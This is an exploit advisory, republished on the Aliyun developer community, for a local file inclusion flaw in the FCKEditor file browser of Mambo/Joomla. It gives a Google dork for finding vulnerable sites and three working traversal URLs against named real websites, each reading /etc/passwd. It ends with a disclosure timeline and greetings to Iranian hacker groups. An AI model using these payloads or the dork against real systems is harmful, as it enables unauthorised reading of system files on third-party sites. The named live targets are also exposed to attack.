Mambo / Joomla FCKEditor Local File Inclusion-阿里云开发者社区

Mambo / Joomla FCKEditor Local File Inclusion

2012-09-23 905

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： ##################################################mambo /joomla (fckeditor) lfi Vulnerability...

##################################################
mambo /joomla (fckeditor) lfi Vulnerability
##################################################

 # Exploit Title :mambo /joomla (fckeditor) lfi Vulnerability
 # Google Dork: /mambots/editors/fckeditor/editor/filemanager/browser/default
 #Author: BHG Security Center
 # Home: http://cc.black-hg.org - http://greyh4t.com/cc/
 # Tested on: [linux+apache]
 # Finder(s):Siavash (morghabi_s@yahoo.com)
 # Examle:
 http://chaboille.voyageur.coop/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../../../../etc/passwd
 http://council.mcsquaredllc.com/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../../../../etc/passwd
 http://www.intexsac.com/espanol/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../../../../etc/passwd
 and more in go0gle
##################################################
[-] Disclosure timeline:

[04/08/2011] - Vulnerabilities discovered
[14/10/2011] - Others vulnerabilities discovered
[15/10/2011] - Issues reported to http://black-hg.org
[04/09/2012] - Public disclosure

# Greets To :
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ G3n3Rall ~ l4tr0d3ctism ~ NoL1m1t

~ Mr.XHat THANKS TO ALL Iranian HackerZ ./Persian Gulf

===========================================[End]=============================================

文章标签：

安全

Mambo / Joomla FCKEditor Local File Inclusion

热门文章

最新文章

相关电子书